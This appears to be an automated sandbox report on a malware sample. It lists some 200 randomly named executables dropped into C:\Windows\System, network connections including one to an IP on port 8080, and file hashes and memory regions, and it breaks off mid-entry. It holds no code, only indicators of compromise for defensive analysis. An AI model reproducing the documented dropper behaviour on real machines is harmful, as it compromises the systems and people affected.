C:\Windows\System\GSEGqrA.exe

C:\Windows\System\GSEGqrA.exe

C:\Windows\System\VIwWGnN.exe

C:\Windows\System\VIwWGnN.exe

C:\Windows\System\tNbEWGK.exe

C:\Windows\System\tNbEWGK.exe

C:\Windows\System\tjLyASq.exe

C:\Windows\System\tjLyASq.exe

C:\Windows\System\GPpWGKl.exe

C:\Windows\System\GPpWGKl.exe

C:\Windows\System\rTjdgJT.exe

C:\Windows\System\rTjdgJT.exe

C:\Windows\System\EurdaoG.exe

C:\Windows\System\EurdaoG.exe

C:\Windows\System\OfRMdDA.exe

C:\Windows\System\OfRMdDA.exe

C:\Windows\System\gvQpTxI.exe

C:\Windows\System\gvQpTxI.exe

C:\Windows\System\GhBoNnv.exe

C:\Windows\System\GhBoNnv.exe

C:\Windows\System\PTrLsXX.exe

C:\Windows\System\PTrLsXX.exe

C:\Windows\System\VLzbBVy.exe

C:\Windows\System\VLzbBVy.exe

C:\Windows\System\ugywleq.exe

C:\Windows\System\ugywleq.exe

C:\Windows\System\kCpYIYy.exe

C:\Windows\System\kCpYIYy.exe

C:\Windows\System\glJrurR.exe

C:\Windows\System\glJrurR.exe

C:\Windows\System\GXjWkjO.exe

C:\Windows\System\GXjWkjO.exe

C:\Windows\System\FRybSEZ.exe

C:\Windows\System\FRybSEZ.exe

C:\Windows\System\eVBbphS.exe

C:\Windows\System\eVBbphS.exe

C:\Windows\System\clBZkmd.exe

C:\Windows\System\clBZkmd.exe

C:\Windows\System\vUHhrKA.exe

C:\Windows\System\vUHhrKA.exe

C:\Windows\System\sxhTHsg.exe

C:\Windows\System\sxhTHsg.exe

C:\Windows\System\vzKZUDi.exe

C:\Windows\System\vzKZUDi.exe

C:\Windows\System\dzOlvZs.exe

C:\Windows\System\dzOlvZs.exe

C:\Windows\System\rojHmFP.exe

C:\Windows\System\rojHmFP.exe

C:\Windows\System\nnNmCsa.exe

C:\Windows\System\nnNmCsa.exe

C:\Windows\System\HlkHrUd.exe

C:\Windows\System\HlkHrUd.exe

C:\Windows\System\hRSaLoA.exe

C:\Windows\System\hRSaLoA.exe

C:\Windows\System\MFGWXUZ.exe

C:\Windows\System\MFGWXUZ.exe

C:\Windows\System\rFWzbKF.exe

C:\Windows\System\rFWzbKF.exe

C:\Windows\System\GjIEBCN.exe

C:\Windows\System\GjIEBCN.exe

C:\Windows\System\mESlGQs.exe

C:\Windows\System\mESlGQs.exe

C:\Windows\System\VjBXtgl.exe

C:\Windows\System\VjBXtgl.exe

C:\Windows\System\yhkyajj.exe

C:\Windows\System\yhkyajj.exe

C:\Windows\System\RpVZcbl.exe

C:\Windows\System\RpVZcbl.exe

C:\Windows\System\UhSKQRg.exe

C:\Windows\System\UhSKQRg.exe

C:\Windows\System\ZfBdSlT.exe

C:\Windows\System\ZfBdSlT.exe

C:\Windows\System\kGbqVYe.exe

C:\Windows\System\kGbqVYe.exe

C:\Windows\System\YvdJVEX.exe

C:\Windows\System\YvdJVEX.exe

C:\Windows\System\BBFlIxN.exe

C:\Windows\System\BBFlIxN.exe

C:\Windows\System\aOvYzDV.exe

C:\Windows\System\aOvYzDV.exe

C:\Windows\System\ArOrbPK.exe

C:\Windows\System\ArOrbPK.exe

C:\Windows\System\RmWPKlM.exe

C:\Windows\System\RmWPKlM.exe

C:\Windows\System\iVuipMk.exe

C:\Windows\System\iVuipMk.exe

C:\Windows\System\YMmoWdw.exe

C:\Windows\System\YMmoWdw.exe

C:\Windows\System\Dzgmkey.exe

C:\Windows\System\Dzgmkey.exe

C:\Windows\System\MIAhefK.exe

C:\Windows\System\MIAhefK.exe

C:\Windows\System\hQsoJby.exe

C:\Windows\System\hQsoJby.exe

C:\Windows\System\dnMTPdI.exe

C:\Windows\System\dnMTPdI.exe

C:\Windows\System\FghMWnG.exe

C:\Windows\System\FghMWnG.exe

C:\Windows\System\bkyAohJ.exe

C:\Windows\System\bkyAohJ.exe

C:\Windows\System\ncmMjyb.exe

C:\Windows\System\ncmMjyb.exe

C:\Windows\System\lMvsGUV.exe

C:\Windows\System\lMvsGUV.exe

C:\Windows\System\utoHRqA.exe

C:\Windows\System\utoHRqA.exe

C:\Windows\System\yUDhsqc.exe

C:\Windows\System\yUDhsqc.exe

C:\Windows\System\LWcTOJI.exe

C:\Windows\System\LWcTOJI.exe

C:\Windows\System\nHDpUfM.exe

C:\Windows\System\nHDpUfM.exe

C:\Windows\System\OCILPrW.exe

C:\Windows\System\OCILPrW.exe

C:\Windows\System\fEQiFlM.exe

C:\Windows\System\fEQiFlM.exe

C:\Windows\System\gCfrMUN.exe

C:\Windows\System\gCfrMUN.exe

C:\Windows\System\IGAMgPB.exe

C:\Windows\System\IGAMgPB.exe

C:\Windows\System\OWkZpKz.exe

C:\Windows\System\OWkZpKz.exe

C:\Windows\System\qaUAjpR.exe

C:\Windows\System\qaUAjpR.exe

C:\Windows\System\pLOfuPs.exe

C:\Windows\System\pLOfuPs.exe

C:\Windows\System\tEvBIbI.exe

C:\Windows\System\tEvBIbI.exe

C:\Windows\System\HIQOsei.exe

C:\Windows\System\HIQOsei.exe

C:\Windows\System\uAtkvrq.exe

C:\Windows\System\uAtkvrq.exe

C:\Windows\System\nVIFnUF.exe

C:\Windows\System\nVIFnUF.exe

C:\Windows\System\ELLKcPU.exe

C:\Windows\System\ELLKcPU.exe

C:\Windows\System\LUcOsgK.exe

C:\Windows\System\LUcOsgK.exe

C:\Windows\System\ItBwWDm.exe

C:\Windows\System\ItBwWDm.exe

C:\Windows\System\eshruAW.exe

C:\Windows\System\eshruAW.exe

C:\Windows\System\opRyiMz.exe

C:\Windows\System\opRyiMz.exe

C:\Windows\System\NFhFRJp.exe

C:\Windows\System\NFhFRJp.exe

C:\Windows\System\AapxYvx.exe

C:\Windows\System\AapxYvx.exe

C:\Windows\System\ZsBdORF.exe

C:\Windows\System\ZsBdORF.exe

C:\Windows\System\FnhFZdw.exe

C:\Windows\System\FnhFZdw.exe

C:\Windows\System\hNGFRDs.exe

C:\Windows\System\hNGFRDs.exe

C:\Windows\System\OnMMcFZ.exe

C:\Windows\System\OnMMcFZ.exe

C:\Windows\System\VqIiSAt.exe

C:\Windows\System\VqIiSAt.exe

C:\Windows\System\GDKvYax.exe

C:\Windows\System\GDKvYax.exe

C:\Windows\System\jqPbjxx.exe

C:\Windows\System\jqPbjxx.exe

C:\Windows\System\LmVnjMy.exe

C:\Windows\System\LmVnjMy.exe

C:\Windows\System\wrpBNAT.exe

C:\Windows\System\wrpBNAT.exe

C:\Windows\System\wefYwrn.exe

C:\Windows\System\wefYwrn.exe

C:\Windows\System\jOclvUi.exe

C:\Windows\System\jOclvUi.exe

C:\Windows\System\GVxjlUw.exe

C:\Windows\System\GVxjlUw.exe

C:\Windows\System\xsVYGtq.exe

C:\Windows\System\xsVYGtq.exe

C:\Windows\System\vDVkCKc.exe

C:\Windows\System\vDVkCKc.exe

C:\Windows\System\WBlbslC.exe

C:\Windows\System\WBlbslC.exe

C:\Windows\System\NBOxZCd.exe

C:\Windows\System\NBOxZCd.exe

C:\Windows\System\hfpDrGM.exe

C:\Windows\System\hfpDrGM.exe

C:\Windows\System\zHNghgZ.exe

C:\Windows\System\zHNghgZ.exe

C:\Windows\System\sEQkOjM.exe

C:\Windows\System\sEQkOjM.exe

C:\Windows\System\OkTabxt.exe

C:\Windows\System\OkTabxt.exe

C:\Windows\System\kulIrso.exe

C:\Windows\System\kulIrso.exe

C:\Windows\System\ZhugELb.exe

C:\Windows\System\ZhugELb.exe

C:\Windows\System\JBIRsWq.exe

C:\Windows\System\JBIRsWq.exe

C:\Windows\System\IJmKYvr.exe

C:\Windows\System\IJmKYvr.exe

C:\Windows\System\yvCQuhD.exe

C:\Windows\System\yvCQuhD.exe

C:\Windows\System\YsoJLgJ.exe

C:\Windows\System\YsoJLgJ.exe

C:\Windows\System\OFpDtAb.exe

C:\Windows\System\OFpDtAb.exe

C:\Windows\System\gYMknjx.exe

C:\Windows\System\gYMknjx.exe

C:\Windows\System\JaPKDAm.exe

C:\Windows\System\JaPKDAm.exe

C:\Windows\System\wTlSbMm.exe

C:\Windows\System\wTlSbMm.exe

C:\Windows\System\AGlzeQT.exe

C:\Windows\System\AGlzeQT.exe

C:\Windows\System\vfkeyzt.exe

C:\Windows\System\vfkeyzt.exe

C:\Windows\System\PWxxKLN.exe

C:\Windows\System\PWxxKLN.exe

C:\Windows\System\WbcZRYY.exe

C:\Windows\System\WbcZRYY.exe

C:\Windows\System\ZMarUMK.exe

C:\Windows\System\ZMarUMK.exe

C:\Windows\System\DvKGQWq.exe

C:\Windows\System\DvKGQWq.exe

C:\Windows\System\SupFtll.exe

C:\Windows\System\SupFtll.exe

C:\Windows\System\ephmkmT.exe

C:\Windows\System\ephmkmT.exe

C:\Windows\System\pXDDanb.exe

C:\Windows\System\pXDDanb.exe

C:\Windows\System\ujqMNAu.exe

C:\Windows\System\ujqMNAu.exe

C:\Windows\System\wTBaZOK.exe

C:\Windows\System\wTBaZOK.exe

C:\Windows\System\BLdgwPH.exe

C:\Windows\System\BLdgwPH.exe

C:\Windows\System\lnOrXsi.exe

C:\Windows\System\lnOrXsi.exe

C:\Windows\System\IywPwdR.exe

C:\Windows\System\IywPwdR.exe

C:\Windows\System\ESPkjhT.exe

C:\Windows\System\ESPkjhT.exe

C:\Windows\System\fhfmIUb.exe

C:\Windows\System\fhfmIUb.exe

C:\Windows\System\ptxKKTy.exe

C:\Windows\System\ptxKKTy.exe

C:\Windows\System\EwwmcNw.exe

C:\Windows\System\EwwmcNw.exe

C:\Windows\System\QMAhknI.exe

C:\Windows\System\QMAhknI.exe

C:\Windows\System\kLEqSXX.exe

C:\Windows\System\kLEqSXX.exe

C:\Windows\System\aATqAgt.exe

C:\Windows\System\aATqAgt.exe

C:\Windows\System\yZLsfvK.exe

C:\Windows\System\yZLsfvK.exe

C:\Windows\System\vaDjsdD.exe

C:\Windows\System\vaDjsdD.exe

C:\Windows\System\tIUkhcX.exe

C:\Windows\System\tIUkhcX.exe

C:\Windows\System\PjZPYlj.exe

C:\Windows\System\PjZPYlj.exe

C:\Windows\System\nCTAyjJ.exe

C:\Windows\System\nCTAyjJ.exe

C:\Windows\System\tMkZvYN.exe

C:\Windows\System\tMkZvYN.exe

C:\Windows\System\cVwnNAh.exe

C:\Windows\System\cVwnNAh.exe

C:\Windows\System\RwxCeaM.exe

C:\Windows\System\RwxCeaM.exe

C:\Windows\System\XtJfgnj.exe

C:\Windows\System\XtJfgnj.exe

C:\Windows\System\HIwTMKh.exe

C:\Windows\System\HIwTMKh.exe

C:\Windows\System\cONorbi.exe

C:\Windows\System\cONorbi.exe

C:\Windows\System\xdrXxQS.exe

C:\Windows\System\xdrXxQS.exe

C:\Windows\System\ycZpYip.exe

C:\Windows\System\ycZpYip.exe

C:\Windows\System\hlRQjhD.exe

C:\Windows\System\hlRQjhD.exe

C:\Windows\System\QosxbsJ.exe

C:\Windows\System\QosxbsJ.exe

C:\Windows\System\KWSHyCu.exe

C:\Windows\System\KWSHyCu.exe

C:\Windows\System\aDCUHPp.exe

C:\Windows\System\aDCUHPp.exe

C:\Windows\System\VgbkLsK.exe

C:\Windows\System\VgbkLsK.exe

C:\Windows\System\UOLIvRA.exe

C:\Windows\System\UOLIvRA.exe

C:\Windows\System\trFZlMM.exe

C:\Windows\System\trFZlMM.exe

C:\Windows\System\QAKWiKd.exe

C:\Windows\System\QAKWiKd.exe

C:\Windows\System\WcrGFQS.exe

C:\Windows\System\WcrGFQS.exe

C:\Windows\System\hatlrEh.exe

C:\Windows\System\hatlrEh.exe

C:\Windows\System\aGCHClI.exe

C:\Windows\System\aGCHClI.exe

C:\Windows\System\zbbtqXX.exe

C:\Windows\System\zbbtqXX.exe

C:\Windows\System\EptUSUy.exe

C:\Windows\System\EptUSUy.exe

C:\Windows\System\KdyYefa.exe

C:\Windows\System\KdyYefa.exe

C:\Windows\System\oEZTQCx.exe

C:\Windows\System\oEZTQCx.exe

C:\Windows\System\uWcKFog.exe

C:\Windows\System\uWcKFog.exe

C:\Windows\System\YwDpgld.exe

C:\Windows\System\YwDpgld.exe

C:\Windows\System\sbFpqcA.exe

C:\Windows\System\sbFpqcA.exe

C:\Windows\System\oJJBuRs.exe

C:\Windows\System\oJJBuRs.exe

C:\Windows\System\vMyTwaK.exe

C:\Windows\System\vMyTwaK.exe

C:\Windows\System\RallqsK.exe

C:\Windows\System\RallqsK.exe

C:\Windows\System\WBhVjPy.exe

C:\Windows\System\WBhVjPy.exe

C:\Windows\System\PWxyLEo.exe

C:\Windows\System\PWxyLEo.exe

C:\Windows\System\DlcpCSI.exe

C:\Windows\System\DlcpCSI.exe

C:\Windows\System\JgFrkLr.exe

C:\Windows\System\JgFrkLr.exe

C:\Windows\System\IbrslCp.exe

C:\Windows\System\IbrslCp.exe

C:\Windows\System\BjZFsqF.exe

C:\Windows\System\BjZFsqF.exe

C:\Windows\System\xwKXZPk.exe

C:\Windows\System\xwKXZPk.exe

C:\Windows\System\MMytEuy.exe

C:\Windows\System\MMytEuy.exe

C:\Windows\System\aMGcYHQ.exe

C:\Windows\System\aMGcYHQ.exe

C:\Windows\System\THmibZK.exe

C:\Windows\System\THmibZK.exe

C:\Windows\System\xeqePMd.exe

C:\Windows\System\xeqePMd.exe

C:\Windows\System\OSPnkPF.exe

C:\Windows\System\OSPnkPF.exe

C:\Windows\System\kLXQyHj.exe

C:\Windows\System\kLXQyHj.exe

C:\Windows\System\hoSNVbm.exe

C:\Windows\System\hoSNVbm.exe

C:\Windows\System\YlfkVnS.exe

C:\Windows\System\YlfkVnS.exe

C:\Windows\System\iMHbHjy.exe

C:\Windows\System\iMHbHjy.exe

C:\Windows\System\Bxqlsgb.exe

C:\Windows\System\Bxqlsgb.exe

C:\Windows\System\luhFUvX.exe

C:\Windows\System\luhFUvX.exe

C:\Windows\System\lcDBXyr.exe

C:\Windows\System\lcDBXyr.exe

C:\Windows\System\PyPpTFB.exe

C:\Windows\System\PyPpTFB.exe

C:\Windows\System\GftvENE.exe

C:\Windows\System\GftvENE.exe

C:\Windows\System\KBHvwAJ.exe

C:\Windows\System\KBHvwAJ.exe

C:\Windows\System\MrjllIq.exe

C:\Windows\System\MrjllIq.exe

C:\Windows\System\ZOXwOLV.exe

C:\Windows\System\ZOXwOLV.exe

C:\Windows\System\cqJnsDs.exe

C:\Windows\System\cqJnsDs.exe

C:\Windows\System\QocmmNY.exe

C:\Windows\System\QocmmNY.exe

C:\Windows\System\hKxLQXm.exe

C:\Windows\System\hKxLQXm.exe

C:\Windows\System\lIvvEyL.exe

C:\Windows\System\lIvvEyL.exe

C:\Windows\System\nOYKhDb.exe

C:\Windows\System\nOYKhDb.exe

C:\Windows\System\dBOXXOf.exe

C:\Windows\System\dBOXXOf.exe

C:\Windows\System\dOEQKeb.exe

C:\Windows\System\dOEQKeb.exe

C:\Windows\System\AetZzCt.exe

C:\Windows\System\AetZzCt.exe

C:\Windows\System\PGvnGui.exe

C:\Windows\System\PGvnGui.exe

C:\Windows\System\HLuHWLS.exe

C:\Windows\System\HLuHWLS.exe

C:\Windows\System\MRVCvGb.exe

C:\Windows\System\MRVCvGb.exe

C:\Windows\System\uuiOnkx.exe

C:\Windows\System\uuiOnkx.exe

C:\Windows\System\LICbgDl.exe

C:\Windows\System\LICbgDl.exe

C:\Windows\System\VcByLOS.exe

C:\Windows\System\VcByLOS.exe

C:\Windows\System\HJFadLg.exe

C:\Windows\System\HJFadLg.exe

C:\Windows\System\gZPdvPm.exe

C:\Windows\System\gZPdvPm.exe

C:\Windows\System\iqXWPij.exe

C:\Windows\System\iqXWPij.exe

C:\Windows\System\gCNijaJ.exe

C:\Windows\System\gCNijaJ.exe

C:\Windows\System\QLKiuxR.exe

C:\Windows\System\QLKiuxR.exe

C:\Windows\System\awYLwuz.exe

C:\Windows\System\awYLwuz.exe

C:\Windows\System\UCjDCiV.exe

C:\Windows\System\UCjDCiV.exe

C:\Windows\System\IeEZaeA.exe

C:\Windows\System\IeEZaeA.exe

C:\Windows\System\ofGgKrx.exe

C:\Windows\System\ofGgKrx.exe

C:\Windows\System\tPjnavr.exe

C:\Windows\System\tPjnavr.exe

C:\Windows\System\sNnFhqY.exe

C:\Windows\System\sNnFhqY.exe

C:\Windows\System\zlzyNLR.exe

C:\Windows\System\zlzyNLR.exe

C:\Windows\System\xTnunsT.exe

C:\Windows\System\xTnunsT.exe

C:\Windows\System\yEoSwRW.exe

C:\Windows\System\yEoSwRW.exe

C:\Windows\System\piyVfjV.exe

C:\Windows\System\piyVfjV.exe

C:\Windows\System\slCdZbA.exe

C:\Windows\System\slCdZbA.exe

C:\Windows\System\CfcXiPy.exe

C:\Windows\System\CfcXiPy.exe

C:\Windows\System\nBZLkaN.exe

C:\Windows\System\nBZLkaN.exe

C:\Windows\System\aOWqlCk.exe

C:\Windows\System\aOWqlCk.exe

C:\Windows\System\HJCshyL.exe

C:\Windows\System\HJCshyL.exe

C:\Windows\System\nVLZmAC.exe

C:\Windows\System\nVLZmAC.exe

C:\Windows\System\XcjbrJi.exe

C:\Windows\System\XcjbrJi.exe

C:\Windows\System\ZHxYzDp.exe

C:\Windows\System\ZHxYzDp.exe

C:\Windows\System\NuBVYQp.exe

C:\Windows\System\NuBVYQp.exe

C:\Windows\System\arPFxbQ.exe

C:\Windows\System\arPFxbQ.exe

C:\Windows\System\GydkqXr.exe

C:\Windows\System\GydkqXr.exe

C:\Windows\System\RWEjxMG.exe

C:\Windows\System\RWEjxMG.exe

C:\Windows\System\gVvFnaR.exe

C:\Windows\System\gVvFnaR.exe

C:\Windows\System\lOGyVlv.exe

C:\Windows\System\lOGyVlv.exe

C:\Windows\System\KAzCaWc.exe

C:\Windows\System\KAzCaWc.exe

C:\Windows\System\HGTxwXo.exe

C:\Windows\System\HGTxwXo.exe

C:\Windows\System\GTcgHEL.exe

C:\Windows\System\GTcgHEL.exe

C:\Windows\System\oUKKmsX.exe

C:\Windows\System\oUKKmsX.exe

C:\Windows\System\jYWKKjl.exe

C:\Windows\System\jYWKKjl.exe

C:\Windows\System\yXxqUPj.exe

C:\Windows\System\yXxqUPj.exe

C:\Windows\System\XYGDWlN.exe

C:\Windows\System\XYGDWlN.exe

C:\Windows\System\PpaZyko.exe

C:\Windows\System\PpaZyko.exe

C:\Windows\System\qJvywwz.exe

C:\Windows\System\qJvywwz.exe

C:\Windows\System\VnrmYVk.exe

C:\Windows\System\VnrmYVk.exe

C:\Windows\System\qDJrcnr.exe

C:\Windows\System\qDJrcnr.exe

C:\Windows\System\fGWiipP.exe

C:\Windows\System\fGWiipP.exe

C:\Windows\System\CsBwzfB.exe

C:\Windows\System\CsBwzfB.exe

C:\Windows\System\JtZstzg.exe

C:\Windows\System\JtZstzg.exe

C:\Windows\system32\wermgr.exe

"C:\Windows\system32\wermgr.exe" "-outproc" "0" "836" "2924" "2868" "2928" "0" "0" "2932" "0" "0" "0" "0" "0"

Network

Country Destination Domain Proto
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 52.123.242.9:443 tcp
GB 52.123.242.49:443 tcp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 71.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 169.117.168.52.in-addr.arpa udp

Files

memory/3280-0-0x00007FF7B7270000-0x00007FF7B7662000-memory.dmp

C:\Windows\System\hGlZwCN.exe

MD5 9c0683cb1aecb5c9c3d8d9c313c42a36
SHA1 6cbb6b9a261167afe99c270ae15d74e099f7bac2
SHA256 befc628c27577c394e547fee3e8d0bf253fa4bb3fe4aca3fef06a6c907ccbab3
SHA512 d5502980b6e161856acc2e3017978cf966bbdf846c1126b026cda84e9e6095f31b912612fced99fbac3fc67f0fe6f2379aee256ae976b924fd0c7a6a6a3a0a3d

memory/2388-10-0x00007FF6D3560000-0x00007FF6D3952000-memory.dmp

C:\Windows\System\dekFayz.exe

MD5 2640bf92b3e66a8dcc6bb8d6f2877d29
SHA1 e8899c61b7f90ec1a9ab619649b6520657af9143
SHA256 3b3b752921bce3d4e0c5f681decbb055abd19aed79649b87e566d6359a7e4713
SHA512 6bd40bfa68cb4318ee09502807aec3c268cb4dcfcfa2cf86fa3de0cf677352fa32097f20584ea2985952a963c9ce0f2602d4f0964d7ff4f9fca250c564f5f92c

memory/3280-1-0x000002CCB9740000-0x000002CCB9750000-memory.dmp

C:\Windows\System\ytwlPrq.exe

MD5 99710bc7a47090c7cb1331a89cb1f8cb
SHA1 62f87e0becfbf7abc27c936f93cdeb5806622572
SHA256 9c696369864fd71931f1af27b5c76223e0358458c82833860d1698c4a44664c3
SHA512 ac5079dc904d99bb9a062bdfc5bcb0db3239ff283c6b66ba40a779dfcac9526d7f34bbdeb1b7f3954bd814974285b72cc0aa80a35b534c5cbfd914279cdcaa3d

memory/944-31-0x00007FF731C50000-0x00007FF732042000-memory.dmp

C:\Windows\System\vapxwfh.exe

MD5 5ab3c365ada72dc4664f528033fc4220
SHA1 c9f7c29b2727c3bdca11e80ad29d2f01f999668e
SHA256 f14f4ef5420275fd97936503013ca83457ec066614298e1c488ecfbd1e07ea3b
SHA512 d34e36f539ddf1906c3441022bec661bae5fdd25bdd1f15ae60c8e3b43c4331bd569fe82b91248cabbc8fd432c3de06c01b966b614500a348ad0f5303dfded28

C:\Windows\System\aafPeZy.exe

MD5 2484540162a39cbab794e24b1c54a035
SHA1 d90be235fe1f509daa9f3de0bc77e937c70fcb18
SHA256 6f80d3cabc3fac93b52edef1e4dbd4430d303484b1ee790e933cf1261a85cd05
SHA512 60b3b7b428d915f7a76c75750d8aa00dfc12db4e0fd19cfed2a7835477d276f9c5233951a86049f5166e0cecebf0c8e0c68535c99d2b30c5fbfed15270814014

C:\Windows\System\ybOctUF.exe

MD5 5ff9ae8ba51d754b4a388aa6a002b05f
SHA1 91ee45746903af6630b7e386dc260aca7b1de00b
SHA256 f75a88e692c63c983f25a1c89166d6da463ab3b402b0fbf377bee17d073836a5
SHA512 28b1bdc596fddacda1057926de60ddb37cc2417654684e563102cd373d1363ae2ee220fae70bd00ccf90a240f87c6140f7265539be3f20a1a39fc8b4668f1a5d

C:\Windows\System\UTxxzDH.exe

MD5 260dcb78ad03d988261faaf3f6841cc7
SHA1 08de5b1e336ea2f949c95bc91914c77d58f85c95
SHA256 1b7b9b0c3a97c5c988ba0ed681207715c9d7f0a06b27f41f5793e00341156e66
SHA512 07f71881be86a85dcd0811f432d5d2f7c239fe28d811af0ddb224eba11c35041a4e47dd87805441e26bee9db897ad16614310732ccecf1319261f83591759a0a

C:\Windows\System\GJdWVCN.exe

MD5 35a32ab2431da837a7934ca5c859cff0
SHA1 e38ef464d29eca81e6c9ba14b730e35e5028a0c8
SHA256 e9c6e5c8f1743513199a86b290daef9d030927ad2739cbb5ee13fdd8536c5c7a
SHA512 7772675870c21724bb7f379acbf9cfe47995472a72e0c18d905c4953ba70140f374f61e1c057ffb30471b348f38064a590040195f3024d6cfd8d7f37321fe73c

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z0ij1nny.4ue.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\System\yLiJdvj.exe

MD5 ffd2cae960666210f8fa72852212cb8b
SHA1 47af3eb539ec29c478defbf55ad0bd7f8b2ea1aa
SHA256 00f436d88917335139a75dc5e7da0855c6c3156347207296349d55cfd3390438
SHA512 cd7704af51f28ac2cfff8aef6ab64892af271f655f10ef1fa8ac5748ca52b252e16798a65145a4af1022bfbf5f65aa3aa91af63c6a2e71a8061096b05aaa41c1

C:\Windows\System\JTqtaXk.exe

MD5 5644441971a4146d7a330f921abc75ac
SHA1 26ec77fb47216061d6d28cb6ec46b57ce86ae21e
SHA256 49a9a5ba6df48f6673d88749e10ecd5daf221b5779fd5a9b30421019c9c0bbde
SHA512 2112af0832042cb675c9c411016615eac5b92235828c949ab1ece6969ddd0269e42c1881985d147e1aac82a74bd56cd744d9368eed299046a0a61d0abad66d8c

C:\Windows\System\aGnqBQm.exe

MD5 a23bf8017c315fc7b06e6248f526b41b
SHA1 0486c7bb4e0028a21db61bed21df101a50d83700
SHA256 f6250e7784a3978b6bdcf1d5858565a4989c1bb2cf1b98d67993874529841de3
SHA512 3fe72e08597481a9c336d552d4f74de5442bc37b2857419e00b84e0922a8a0176569d6d78b24d0da135ba6522cf3acb1a1682c8c8eab5c8d599a9f4c87838af6

C:\Windows\System\wGFQQMu.exe

MD5 7cdcc9f7fccd1e4157ca228c7a5a2ab9
SHA1 9811323b4275bfcc717a6b992469737983634c92
SHA256 81aa06fde10e782b64e9c96168e984f8bca6812e612b14b9a27ae61392c5d237
SHA512 60f0d6d117592b0cf9adb82ab4c26380fc0e4f2568424f1a843ab4eb0c5861268d7a7e0e2ff4c9dd52e1e22b86ab30efd159c6b8a5db64b5bd6dcb3c9eb5322e

C:\Windows\System\TRIFEVO.exe

MD5 ba81df05e5f65282d5e208780a9cbbf4
SHA1 46a42468633ca347b9d18d40e6fdfe6caef36046
SHA256 bbe8dc300676d7e8073dbf17809a022e66e00913827d48afe1e6429294299ba4
SHA512 e99690fdbf977b27f040c292e3005e831ecd99a41d974eabac075871608fcd33e21696abe54a7d22ea1f8aaf276e8a82de96fc11ab04c7da1d637e2bf24af27d

C:\Windows\System\IJGzTPM.exe

MD5 f51b907d976d36a8f834f5d0aa8ee67e
SHA1 8fe9b8bc5949e13d6631c0aab5af4340037313d2
SHA256 ca1cfae6af0bd000e68da8179fa7156f4d80e07d5b988e001c70c26034178f97
SHA512 4f77a5de1d385503961e68ff3c8e0025c6ce51e025239b320952df0b4ec436c5785b7cc7d22b0215ad38b91c80d061e38bcc150da2322303711c4aeb7400963a

memory/2996-390-0x00007FF6E0C30000-0x00007FF6E1022000-memory.dmp

memory/836-391-0x0000012AE3F20000-0x0000012AE46C6000-memory.dmp

memory/1260-401-0x00007FF658520000-0x00007FF658912000-memory.dmp

memory/2368-413-0x00007FF7BF010000-0x00007FF7BF402000-memory.dmp

memory/2428-422-0x00007FF6551F0000-0x00007FF6555E2000-memory.dmp

memory/3248-435-0x00007FF6EFE10000-0x00007FF6F0202000-memory.dmp

memory/724-451-0x00007FF7EDE60000-0x00007FF7EE252000-memory.dmp

memory/1572-475-0x00007FF654C70000-0x00007FF655062000-memory.dmp

memory/680-471-0x00007FF7D7000000-0x00007FF7D73F2000-memory.dmp

memory/4800-467-0x00007FF6C7E30000-0x00007FF6C8222000-memory.dmp

memory/4416-448-0x00007FF6E4160000-0x00007FF6E4552000-memory.dmp

memory/1332-447-0x00007FF7AD420000-0x00007FF7AD812000-memory.dmp

memory/884-443-0x00007FF6D8BD0000-0x00007FF6D8FC2000-memory.dmp

memory/1056-430-0x00007FF653B90000-0x00007FF653F82000-memory.dmp

memory/3408-406-0x00007FF6717C0000-0x00007FF671BB2000-memory.dmp

memory/1540-395-0x00007FF7E1720000-0x00007FF7E1B12000-memory.dmp

C:\Windows\System\HFtCfxV.exe

MD5 ac5d006209a4d96fd5c921b53edef7a4
SHA1 c8969b3b6d5625515256dbf3195a0670046a6a83
SHA256 8abc1b9a71571f1fc71e9da86962961dc2ff0613d94f9b7fe07221658c38a448
SHA512 51e14f2e8e436c68d5ff8f80d3e9eb39f937198d94447028becf442cb28e80fd6b85c2476b05789ec9fe845819ea7a5509e12edea9ec78d71a0eb004d681730f

C:\Windows\System\sCBvpsg.exe

MD5 94222e3e865f81ad46b684bbce128096
SHA1 615d8badde85be0955d091c66147509bb41ff823
SHA256 2d353ef856b1dd2db9721167167455f42fd6e0a68ed50443fa3fab036d42df59
SHA512 60236ab94105df1f28bb4ec6aabb1f38901237d920ccad71f87f7bb63c9fedf41797cc245ce1ebbd9ef711bdb3713c6607f893b8afacdaf4446eb0e4d1f07ec0

C:\Windows\System\zIeGbca.exe

MD5 970d25ee72a006ec1167e34c23050e3d
SHA1 aeec8b13705928befd04020dd64bc88ce8f53176
SHA256 1d88add0c4db5cc14404ca54b18eff60b22e9b3a838a343c4aae24895ddc7baf
SHA512 cfaf377b3596ad6abd54f1dddf2d150035a8663b54bc5ef98abe0023991ab84ce3c3cbdb212b073271a5c721a7595938beb06bf6fe8518178be71705f81c9737

C:\Windows\System\JWnEiLH.exe

MD5 d3d6ae5d5c72f084c3401001536dc597
